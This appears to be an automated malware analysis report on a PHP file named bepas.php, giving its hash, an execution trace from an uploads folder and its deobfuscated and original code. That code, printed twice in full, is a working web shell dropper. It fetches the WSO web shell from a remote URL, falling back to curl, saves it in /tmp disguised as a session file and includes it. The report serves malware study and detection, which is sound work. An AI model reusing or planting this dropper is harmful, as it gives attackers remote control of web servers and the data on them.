PHP Malware Analysis

bepas.php

md5: d8801ee10a23fbeb3f4176611d52ca09

Deobfuscated PHP code

<?php

#tmp shell by odiq $URL = 'https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso.php'; #admin $TMP = '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'; function M() { $FGT = @file_get_contents($GLOBALS['URL']); if(!$FGT) { echo `curl -k $(echo {$GLOBALS['URL']}) > {$GLOBALS['TMP']}`; } else { $HANDLE = fopen($GLOBALS['TMP'], 'w'); fwrite($HANDLE, $FGT); fclose($HANDLE); } echo '<script>window.location="?work";</script>'; } if(file_exists($TMP)) { if(filesize($TMP) === 0) { unlink($TMP); M(); } else { include($TMP); } } else { M(); }

Execution traces

data/traces/d8801ee10a23fbeb3f4176611d52ca09_trace-1676237321.5365.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:29:07.434327]
1	0	1	0.000153	393512
1	3	0	0.000199	392952	{main}	1		/var/www/html/uploads/bepas.php	0	0
1	3	1	0.000215	392952
			0.000240	314224
TRACE END   [2023-02-12 19:29:07.434448]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php #tmp shell by odiq $URL = 'https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso.php'; #admin $TMP = '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'; function M() { $FGT = @file_get_contents($GLOBALS['URL']); if(!$FGT) { echo `curl -k $(echo {$GLOBALS['URL']}) > {$GLOBALS['TMP']}`; } else { $HANDLE = fopen($GLOBALS['TMP'], 'w'); fwrite($HANDLE, $FGT); fclose($HANDLE); } echo '<script>window.location="?work";</script>'; } if(file_exists($TMP)) { if(filesize($TMP) === 0) { unlink($TMP); M(); } else { include($TMP); } } else { M(); } ?>